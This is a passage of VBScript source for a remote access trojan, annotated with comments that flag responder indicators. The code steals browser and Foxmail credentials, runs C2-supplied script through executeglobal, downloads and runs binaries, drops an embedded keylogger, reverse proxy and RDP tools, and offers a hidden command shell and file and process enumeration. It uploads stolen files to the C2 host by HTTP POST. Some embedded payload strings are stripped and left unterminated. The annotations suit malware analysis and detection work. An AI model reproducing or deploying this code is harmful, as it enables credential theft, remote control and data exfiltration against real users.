     ' Returns the 8.3 short path of an existing file; used to avoid quoting
     ' issues when building the python command line in decode_pass.
  590. function gsp(path)
  591.     gsp = filesystemobj.getfile(path).shortpath
  592. end function
  593.  
     ' Credential theft dispatcher, keyed on retcmd:
     '   "ie"      - fileurl is a base64 blob; it is decoded and run with
     '               executeglobal, i.e. arbitrary C2-supplied VBScript.
     '   "chrome"  - copies <profile root>\Google\Chrome\User Data\Default\Login Data
     '               to <installdir>\Login Data, then decode_pass("chrome").
     '   "foxmail" - decode_pass("foxmail") if the SDK is present.
     '   "mozilla" - reads the first Path= from %appdata%\Mozilla\Firefox\profiles.ini
     '               (logins.json path is computed but only the SDK-backed
     '               decode_pass("mozilla") is invoked).
     '   anything else falls through to passgrabber2 (external recovery tool).
     ' `return` on the "ie" branch is not a VBScript statement; under
     ' on error resume next it has no effect and the branch simply ends.
  594. sub passgrabber (fileurl, filename, retcmd)
  595. on error resume next
  596. dim content, profile, folder
  597. set objfsodownload = createobject ("scripting.filesystemobject")
  598. if retcmd = "ie" then
  599.     content = decode_base64(fileurl)
  600.     executeglobal content
  601.     return
  602. elseif retcmd = "chrome" then
  603.     folder = shellobj.expandenvironmentstrings("%temp%")
     ' Derives the user profile root by cutting %temp% at "temp" -- assumes the
     ' default %LOCALAPPDATA%\Temp layout.
  604.     folder = mid(folder, 1, instr(lcase(folder), "temp") - 1) & "Google\Chrome\User Data\Default\Login Data"
  605.     if  objfsodownload.fileexists(folder) then
  606.         objfsodownload.copyfile folder, installdir & "Login Data", true
  607.        
  608.         if objfsodownload.fileexists(sdkfile) then
  609.             'proceed decoding
  610.             decode_pass(retcmd)
  611.             objfsodownload.deletefile(installdir & "Login Data")
  612.         else
  613.             'request for sdk
  614.             post "show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu"
  615.         end if
  616.     else
  617.         post retcmd, "No Password Found"
  618.     end if
  619. elseif retcmd = "foxmail" then 
  620.     if objfsodownload.fileexists(sdkfile) then
  621.         'proceed decoding
  622.         decode_pass(retcmd)
  623.     else
  624.         'request for sdk
  625.         post "show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu"
  626.     end if
  627. elseif retcmd = "mozilla" then
  628.     folder = shellobj.expandenvironmentstrings("%appdata%") & "\Mozilla\Firefox\"
  629.     if  objfsodownload.fileexists (folder & "profiles.ini") then
  630.         content = filesystemobj.openTextFile(folder & "profiles.ini").readall
  631.         if instr(content, "Path=") > 0 then
  632.             content = mid(content, instr(content, "Path=") + 5)
  633.             content = mid(content, 1, instr(content, vbCrLf) - 1)
  634.             profile = Replace(folder & content, "/", "\")
  635.             folder = profile & "\logins.json"
  636.  
  637.             'check if moz-sdk exists, if not, request for it
  638.             if objfsodownload.fileexists(sdkfile) then
  639.                 'proceed decoding
  640.                 decode_pass(retcmd)
  641.             else
  642.                 'request for sdk
  643.                 post "show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu"
  644.             end if
  645.         else
  646.             post retcmd, "No Password Found"
  647.         end if
  648.     else
  649.         post retcmd, "No Password Found"
  650.     end if
  651. else
  652.     passgrabber2 fileurl, filename, retcmd
  653. end if
  654.  
  655. end sub
  656.  
     ' Extracts a .zip with the Shell.Application namespace API (no external
     ' tool). Existing files with the same name are deleted first. copyHere
     ' flag 20 = 4 (no progress dialog) + 16 (answer "Yes to All"), so the
     ' extraction is silent. Only runs when the extension is exactly "zip".
  657. Sub UnZip(zipfile, ExtractTo)
  658.     if filesystemobj.GetExtensionName(zipfile) = "zip" then
  659.         If NOT filesystemobj.FolderExists(ExtractTo) Then
  660.             filesystemobj.CreateFolder(ExtractTo)
  661.         End If
  662.         set objShell = CreateObject("Shell.Application")
  663.         set destination = objShell.NameSpace(ExtractTo)
  664.         set zip_content = objShell.NameSpace(zipfile).Items  
  665.         for i = 0 to zip_content.count - 1
  666.             if (filesystemobj.FileExists(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path))) then
  667.                 filesystemobj.DeleteFile(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path))
  668.             end if
  669.             destination.copyHere zip_content.item(i), 20
  670.         next
  671.     End if
  672. End Sub
  673.  
     ' Runs an external credential-recovery executable (filename, e.g. cmdc.exe).
     ' The binary comes from getMailRec() (not in this listing) as a zip,
     ' saved as <installdir>\<filename>.zip and extracted into installdir. A
     ' .cfg file is written beside it, then the tool is launched with
     ' `/stext <tool>data`; the /stext switch and the [General] config keys are
     ' consistent with NirSoft-style recovery utilities, though that is not
     ' confirmed by this file. Output is copied to
     ' <installdir>\wshlogs\recovered_password_email.log and uploaded
     ' (upload / deletefaf are not in this listing). fileurl is unused here.
  674. sub passgrabber2 (fileurl, filename, retcmd)
  675.  
  676. on error resume next
  677. shellobj.run "%comspec% /c taskkill /F /IM " & filename, 0, true
  678. filesystemobj.deleteFile(installdir & filename & "data")
  679. config_file = installdir & mid(filename, 1, instrrev(filename, ".")) & ".cfg"
  680. cfg = "[General]" & vbcrlf & "ShowGridLines=0" & vbcrlf & "SaveFilterIndex=0" & vbcrlf & "ShowInfoTip=1" & vbcrlf & "UseProfileFolder=0" & vbcrlf & "ProfileFolder=" & vbcrlf & "MarkOddEvenRows=0" & vbcrlf & "WinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00" & vbcrlf & "Columns=FA 00 00 00 FA 00 01 00 6E 00 02 00 6E 00 03 00 78 00 04 00 78 00 05 00 78 00 06 00 64 00 07 00 FA 00 08 00" & vbcrlf & "Sort=0"
  681. 'write config
  682. set writer = filesystemobj.openTextFile(config_file, 2, true)
  683. writer.writeLine(cfg)
  684. writer.close()
  685. set writer = nothing
  686.  
  687. strlink = fileurl
  688. strsaveto = installdir & filename
  689.  
  690.  
  691. set objfsodownload = createobject ("scripting.filesystemobject")
  692. if  objfsodownload.fileexists (strsaveto) then
  693.     objfsodownload.deletefile (strsaveto)
  694. end if
  695.  
  696.  dim  objstreamdownload
  697.  set  objstreamdownload = createobject("adodb.stream")
  698.  with objstreamdownload
  699.         .type = 1
  700.         .open
  701.         .write getMailRec()
  702.         .savetofile strsaveto & ".zip", 2
  703.         .close
  704.    end with
  705.    set objstreamdownload = nothing
  706.  
  707. if objfsodownload.fileexists(strsaveto & ".zip") then
  708.    UnZip strsaveto & ".zip", installdir
  709.    set runner = CreateObject("Shell.Application")
  710.    saver = objfsodownload.getFile(strsaveto).shortPath
  711.    
  712.    'up to 5 attempts (i = 0..4) before giving up
  713.   for i = 0 to 4
  714.     shellobj.run "%comspec% /c taskkill /F /IM " & filename, 0, true
  715.     wscript.sleep(1000)
  716.     runner.shellexecute saver, " /stext " & saver & "data"
  717.     wscript.sleep(2000)
  718.    
  719.     if objfsodownload.fileExists(saver & "data") then
  720.         dim  httpobj,objstreamuploade,buffer, outpath, folder  ' local httpobj shadows the global one inside this sub
  721.         set  objstreamuploade = createobject("adodb.stream")
  722.         with objstreamuploade
  723.              .type = 2
  724.              .open
  725.              .loadfromfile saver & "data"
  726.              buffer = .readtext
  727.              .close
  728.         end with
  729.         set objstreamuploade = nothing
  730.            
  731.         outpath = installdir & "wshlogs\recovered_password_email.log"
  732.        
  733.         folder = objfsodownload.GetParentFolderName(outpath)
  734.  
  735.         if not objfsodownload.FolderExists(folder) then
  736.             shellobj.run "%comspec% /c mkdir " & chr(34) & folder & chr(34), 0, true
  737.         end if
  738.         set writer = filesystemobj.openTextFile(outpath, 2, true)
  739.         writer.write(buffer)
  740.         writer.close()
  741.         set writer = nothing
  742.         upload saver & "data", retcmd  ' exfiltration of the recovered credentials
  743.         exit for
  744.     end if
  745.    next
  746.    deletefaf(strsaveto)
  747. end if
  748.  
  749. end sub
  750.  
  751. sub reverseproxy (filename, filearg)
       ' Drops the script-embedded "reverse proxy" executable (see getReverseProxy)
       ' into installdir under the caller-supplied filename and launches it with the
       ' C2 host and port from the config block plus filearg on its command line.
       ' Artifacts for responders: a taskkill of <filename>, a new file at
       ' installdir\<filename>, and a child process of wscript with host/port arguments.
  752. shellobj.run "%comspec% /c taskkill /F /IM " & filename, 0, true   ' hidden window, waits for exit
  753. strsaveto = installdir & filename
  754. 
  755. set objfsodownload = createobject ("scripting.filesystemobject")
  756. if  objfsodownload.fileexists (strsaveto) then
  757.     objfsodownload.deletefile (strsaveto)   ' replace any earlier copy
  758. end if
  759. 
  760. dim  objstreamdownload
  761. set  objstreamdownload = createobject("adodb.stream")
  762. with objstreamdownload
  763.     .type = 1                     ' binary stream
  764.     .open
  765.     .write getReverseProxy()      ' bytes come from the base64 blob in this script, not from the network
  766.     .savetofile strsaveto
  767.     .close
  768. end with
  769. set objstreamdownload = nothing
  770. 
  771. if objfsodownload.fileexists(strsaveto) then
  772.    shellobj.run chr(34) & strsaveto & chr(34) & " " & host & " " & port & " " & filearg   ' visible window; no wait
  773. end if
  774. end sub
  775.  
  776. sub reverserdp(filename, filearg, fileurl)
       ' Fetches a binary from fileurl over HTTP (msxml2.serverxmlhttp), writes it to
       ' installdir\<filename>, then launches it with the C2 host/port and filearg.
       ' Unlike servicestarter/sitedownloader below there is no status = 200 check,
       ' so whatever responseBody was returned is written to disk and executed.
  777. on error resume next   ' all failures below are silent
  778. shellobj.run "%comspec% /c taskkill /F /IM " & filename, 0, true
  779. strsaveto = installdir & filename
  780. 
  781. set objhttpdownload = CreateObject("msxml2.serverxmlhttp")
  782. objhttpdownload.open "get", fileurl, false   ' synchronous GET
  783. objhttpdownload.setRequestHeader "cache-control", "max-age=0"
  784. objhttpdownload.send
  785.    
  786. set objfsodownload = CreateObject("scripting.filesystemobject")
  787. if objfsodownload.fileExists(strsaveto) then
  788.     objfsodownload.deleteFile(strsaveto)
  789. end if
  790. 
  791. set objstreamdownload = CreateObject("adodb.stream")
  792. objstreamdownload.Type = 1   ' binary
  793. objstreamdownload.Open
  794. objstreamdownload.Write(objhttpdownload.responseBody)
  795. objstreamdownload.SaveToFile(strsaveto)
  796. objstreamdownload.close
  797.    
  798. set objstreamdownload = nothing
  799. 
  800. if objfsodownload.fileExists(strsaveto) then
  801.    shellobj.run chr(34) & strsaveto & chr(34) & " " & host & " " & port & " " & filearg   ' child process carries C2 host/port on its command line
  802. end if
  803. end sub
  804.  
  805. sub keyloggerstarter (fileurl, filename, filearg, is_offline, is_rdp)
       ' Writes one of two script-embedded executables to installdir\<filename> and
       ' runs it: getRDP() when is_rdp is true, otherwise getKeyLogger(). The launched
       ' process receives the C2 host, port, a quoted filearg and the is_offline flag.
       ' fileurl is copied into strlink but never used afterwards in this sub, so no
       ' network download happens here.
  806. shellobj.run "%comspec% /c taskkill /F /IM " & filename, 0, true
  807. strlink = fileurl
  808. strsaveto = installdir & filename
  809. 
  810. set objfsodownload = createobject ("scripting.filesystemobject")
  811. if  objfsodownload.fileexists (strsaveto) then
  812.     objfsodownload.deletefile (strsaveto)
  813. end if
  814. 
  815. dim  objstreamdownload
  816. set  objstreamdownload = createobject("adodb.stream")
  817. with objstreamdownload
  818.     .type = 1   ' binary
  819.     .open
  820.     if is_rdp = true then
  821.         .write getRDP()
  822.     else
  823.         .write getKeyLogger()
  824.     end if
  825.     .savetofile strsaveto
  826.     .close
  827. end with
  828. set objstreamdownload = nothing
  829. 
  830. if objfsodownload.fileexists(strsaveto) then
  831.    shellobj.run chr(34) & strsaveto & chr(34) & " " & host & " " & port & " " & chr(34) & filearg & chr(34) & " " & is_offline
  832. end if
  833. end sub
  834.  
  835. sub servicestarter (fileurl, filename, filearg)
       ' Downloads fileurl with msxml2.xmlhttp, saves it to installdir\<filename> only
       ' when the HTTP status is 200, and launches it with the C2 host/port and a
       ' quoted filearg. Any stale file of the same name is deleted first.
  836. shellobj.run "%comspec% /c taskkill /F /IM " & filename, 0, true
  837. strlink = fileurl
  838. strsaveto = installdir & filename
  839. set objhttpdownload = createobject("msxml2.xmlhttp" )
  840. objhttpdownload.open "get", strlink, false
  841. objhttpdownload.setrequestheader "cache-control:", "max-age=0"   ' header name is sent with a trailing colon here
  842. objhttpdownload.send
  843. 
  844. set objfsodownload = createobject ("scripting.filesystemobject")
  845. if  objfsodownload.fileexists (strsaveto) then
  846.     objfsodownload.deletefile (strsaveto)
  847. end if
  848. 
  849. if objhttpdownload.status = 200 then
  850.    dim  objstreamdownload
  851.    set  objstreamdownload = createobject("adodb.stream")
  852.    with objstreamdownload
  853.         .type = 1   ' binary
  854.         .open
  855.         .write objhttpdownload.responsebody
  856.         .savetofile strsaveto
  857.         .close
  858.    end with
  859.    set objstreamdownload = nothing
  860. end if
  861. if objfsodownload.fileexists(strsaveto) then
  862.    shellobj.run chr(34) & strsaveto & chr(34) & " " & host & " " & port & " " & chr(34) & filearg & chr(34)
  863. end if
  864. end sub
  865.  
  866. sub sitedownloader (fileurl,filename)
       ' Downloads fileurl (msxml2.serverxmlhttp) to installdir\<filename> when the
       ' status is 200, runs it via its 8.3 short path, and reports "Executed+File"
       ' back to the C2 through updatestatus.
  867. 
  868. strlink = fileurl
  869. strsaveto = installdir & filename
  870. set objhttpdownload = createobject("msxml2.serverxmlhttp" )
  871. objhttpdownload.open "get", strlink, false
  872. objhttpdownload.setrequestheader "cache-control", "max-age=0"
  873. objhttpdownload.send
  874. 
  875. set objfsodownload = createobject ("scripting.filesystemobject")
  876. if  objfsodownload.fileexists (strsaveto) then
  877.     objfsodownload.deletefile (strsaveto)
  878. end if
  879. 
  880. if objhttpdownload.status = 200 then
  881.    dim  objstreamdownload
  882.    set  objstreamdownload = createobject("adodb.stream")
  883.    with objstreamdownload
  884.         .type = 1   ' binary
  885.         .open
  886.         .write objhttpdownload.responsebody
  887.         .savetofile strsaveto
  888.         .close
  889.    end with
  890.    set objstreamdownload = nothing
  891. end if
  892. if objfsodownload.fileexists(strsaveto) then
  893.    shellobj.run objfsodownload.getfile (strsaveto).shortpath   ' executed with no arguments
  894.    updatestatus("Executed+File")
  895. end if
  896. end sub
  897.  
  898. sub download (fileurl,filedir)
       ' Asks the C2 for a file: POST http://<host>:<port>/send-to-me|<fileurl>, with
       ' the user-agent header set to `information` (presumably the host fingerprint
       ' string built elsewhere in the script; not visible in this section). The
       ' response body is saved under filedir (default installdir) using the last
       ' backslash-separated segment of fileurl as the name, then executed and
       ' "Executed+File" is reported back.
  899. if filedir = "" then
  900.    filedir = installdir
  901. end if
  902. 
  903. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)   ' basename split on "\" only
  904. set objhttpdownload = createobject("msxml2.xmlhttp")
  905. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "send-to-me" & spliter & fileurl, false
  906. objhttpdownload.setrequestheader "user-agent:",information
  907. objhttpdownload.send ""
  908.      
  909. set objfsodownload = createobject ("scripting.filesystemobject")
  910. if  objfsodownload.fileexists (strsaveto) then
  911.     objfsodownload.deletefile (strsaveto)
  912. end if
  913. if  objhttpdownload.status = 200 then
  914.     dim  objstreamdownload
  915.     set  objstreamdownload = createobject("adodb.stream")
  916.     with objstreamdownload
  917.          .type = 1   ' binary
  918.          .open
  919.          .write objhttpdownload.responsebody
  920.          .savetofile strsaveto
  921.          .close
  922.     end with
  923.     set objstreamdownload  = nothing
  924. end if
  925. if objfsodownload.fileexists(strsaveto) then
  926.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
  927.    updatestatus("Executed+File")
  928. end if
  929. end sub
  930.  
  931. function updatestatus(status_msg)
       ' Beacon helper: POST http://<host>:<port>/update-status|<status_msg> with an
       ' empty body and the user-agent header set to `information`. Errors are
       ' suppressed and the function returns nothing. The "update-status" path and
       ' the "|" separator are fixed strings usable for network detection.
  932.     on error resume next
  933.     set objsoc = createobject("msxml2.xmlhttp")
  934.     objsoc.open "post","http://" & host & ":" & port &"/" & "update-status" & spliter & status_msg, false
  935.     objsoc.setrequestheader "user-agent:",information
  936.     objsoc.send ""
  937. 
  938. end function
  939.  
  940. function upload (fileurl, retcmd)
       ' Exfiltration helper: reads the local file at fileurl as raw bytes and POSTs
       ' them to http://<host>:<port>/<retcmd>. Despite the parameter name, fileurl
       ' is a local path passed to loadfromfile. The local `dim httpobj` shadows the
       ' script-level httpobj declared in the public var section. No return value.
  941. 
  942. dim  httpobj,objstreamuploade,buffer
  943. set  objstreamuploade = createobject("adodb.stream")
  944. with objstreamuploade
  945.      .type = 1   ' binary
  946.      .open
  947.      .loadfromfile fileurl
  948.      buffer = .read
  949.      .close
  950. end with
  951. set objstreamdownload = nothing   ' note: names objstreamdownload, not the objstreamuploade opened above
  952. set httpobj = createobject("msxml2.xmlhttp")
  953. httpobj.open "post","http://" & host & ":" & port &"/" & retcmd, false
  954. httpobj.setrequestheader "user-agent:",information
  955. httpobj.send buffer   ' file contents travel as the POST body
  956. end function
  957.  
  958.  
  959. sub deletefaf (url)
       ' Removes the path given in url, trying it first as a file and then as a
       ' folder. With errors suppressed, whichever call does not apply simply fails
       ' silently.
  960. on error resume next
  961. 
  962. filesystemobj.deletefile url
  963. filesystemobj.deletefolder url
  964. 
  965. end sub
  966.  
  967. function cmdshell (cmd)
       ' Remote shell primitive: runs cmd through %comspec% in a hidden window,
       ' redirecting stdout to installdir\out.txt, then reads that file back, deletes
       ' it and returns the captured text. The transient out.txt and the cmd.exe
       ' child of wscript.exe are the observable artifacts; stderr is not captured.
  968. dim httpobj,oexec,readallfromany   ' httpobj and oexec are declared but unused here
  969. strsaveto = installdir & "out.txt"
  970. shellobj.run "%comspec% /c " & cmd & " > " & chr(34) & strsaveto & chr(34), 0, true   ' waits for completion
  971. readallfromany = filesystemobj.opentextfile(strsaveto).readall()
  972. filesystemobj.deletefile strsaveto
  973. 
  974. cmdshell = readallfromany
  975. end function
  976.  
  977.  
  978. function enumprocess()
       ' Lists running processes via WMI (Win32_Process) and returns them as one
       ' string: name ^ processid ^ executablepath, records separated by spliter ("|").
       ' A WMI query from a wscript.exe process is itself a useful telemetry signal.
  979. on error resume next
  980. 
  981. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
  982. set colitems = objwmiservice.execquery("select * from win32_process",,48)   ' 48 = forward-only, return immediately
  983. 
  984. dim objitem
  985. for each objitem in colitems
  986.     enumprocess = enumprocess & objitem.name & "^"
  987.     enumprocess = enumprocess & objitem.processid & "^"
  988.     enumprocess = enumprocess & objitem.executablepath & spliter
  989. next
  990. end function
  991.  
  992. sub exitprocess (pid)
       ' Force-terminates the process tree rooted at pid using taskkill /F /T, in a
       ' hidden window, waiting for taskkill to return. Errors are suppressed.
  993. on error resume next
  994. 
  995. shellobj.run "taskkill /F /T /PID " & pid,0,true
  996. end sub
  997.  
  998. function getParentDirectory(path)
       ' Returns the parent folder name of the file at path; GetFile raises if the
       ' path does not exist, and no error handling is set in this function.
  999.     set fo = filesystemobj.GetFile(path)
  1000.     getParentDirectory = filesystemobj.getparentfoldername(fo)
  1001. end function
  1002.  
  1003. function enumfaf (enumdir)
        ' Directory listing for the C2: subfolders first, then files, each record
        ' "^"-separated and terminated by spliter. Folder records carry an empty size
        ' field and a literal "d" marker; file records carry name, size and attributes.
  1004. 
  1005. 'enumfaf = enumdir & spliter
  1006. for  each folder in filesystemobj.getfolder (enumdir).subfolders
  1007.      enumfaf = enumfaf & folder.name & "^" & "" & "^" & "d" & "^" & folder.attributes & spliter
  1008. next
  1009. 
  1010. for  each file in filesystemobj.getfolder (enumdir).files
  1011.      enumfaf = enumfaf & file.name & "^" & file.size  & "^" & file.attributes & spliter
  1012. next
  1013. end function
  1014.  
  1015. function getKeyLogger()
        ' Decodes a base64 blob into bytes using an MSXML element with
        ' dataType "bin.base64" (a common script-side decoder). The payload itself
        ' is not present in this paste: the string literal on the next line is left
        ' unterminated, so this function cannot run as shown.
  1016.     encoded = "
  1017.     set spike = (CreateObject("Microsoft.XMLDOM")).createElement("tmp")
  1018.     spike.dataType = "bin.base64"
  1019.     spike.text = encoded
  1020.     getKeyLogger = spike.NodeTypedValue   ' decoded byte array
  1021. end function
  1022.  
  1024. function getRDP()
        ' Same MSXML bin.base64 decode pattern as getKeyLogger; the embedded blob is
        ' stripped from this paste and the literal is unterminated.
  1025.     encoded = "
  1026.     set spike = (CreateObject("Microsoft.XMLDOM")).createElement("tmp")
  1027.     spike.dataType = "bin.base64"
  1028.     spike.text = encoded
  1029.     getRDP = spike.NodeTypedValue
  1030. end function
  1030.  
  1032. function getReverseProxy()
        ' Same MSXML bin.base64 decode pattern as getKeyLogger; the embedded blob is
        ' stripped from this paste and the literal is unterminated.
  1033.     encoded = "
  1034.     set spike = (CreateObject("Microsoft.XMLDOM")).createElement("tmp")
  1035.     spike.dataType = "bin.base64"
  1036.     spike.text = encoded
  1037.     getReverseProxy = spike.NodeTypedValue
  1038. end function
  1038.  
  1040. function getMailRec()
        ' Decoder for the mail-recovery payload. In this copy `encoded` is an empty
        ' string, so NodeTypedValue yields no bytes; the caller (above) would write
        ' an empty .zip.
  1041.     encoded = ""
  1042.     set spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp")
  1043.     spike.dataType = "bin.base64"
  1044.     spike.text = encoded
  1045.     getMailRec = spike.NodeTypedValue
  1046. end function
  1046.  
  1047. function getBinder()
        ' "[binder]" is a build-time placeholder: when it has been replaced by base64
        ' data the function decodes it to bytes, otherwise it returns false, which is
        ' what the top-level `if getBinder() <> false then runBinder()` check tests.
  1048.     encoded = "[binder]"
  1049.     if encoded <> "[binder]" then
  1050.         set spike = (CreateObject("Microsoft.XMLDOM")).createElement("tmp")
  1051.         spike.dataType = "bin.base64"
  1052.         spike.text = encoded
  1053.         getBinder = spike.NodeTypedValue
  1054.     else
  1055.         getBinder = false   ' no bound payload in this build
  1056.     end if
  1057. end function
  1058.  
  1059. sub runBinder()
        ' Writes the bound payload (getBinder) to installdir\ibnder.exe and runs it
        ' with no arguments. The misspelled file name "ibnder.exe" is a fixed string
        ' in this variant and a straightforward file-system indicator.
  1060. strsaveto = installdir & "ibnder.exe"
  1061. 
  1062. set objfsodownload = createobject ("scripting.filesystemobject")
  1063. if  objfsodownload.fileexists (strsaveto) then
  1064.     objfsodownload.deletefile (strsaveto)
  1065. end if
  1066. 
  1067. dim  objstreamdownload
  1068. set  objstreamdownload = createobject("adodb.stream")
  1069. with objstreamdownload
  1070.     .type = 1   ' binary
  1071.     .open
  1072.     .write getBinder()   ' called again here; the result is not cached from the top-level check
  1073.     .savetofile strsaveto
  1074.     .close
  1075. end with
  1076. set objstreamdownload = nothing
  1077. 
  1078. if objfsodownload.fileexists(strsaveto) then
  1079.    shellobj.run chr(34) & strsaveto & chr(34)
  1080. end if
  1081. end sub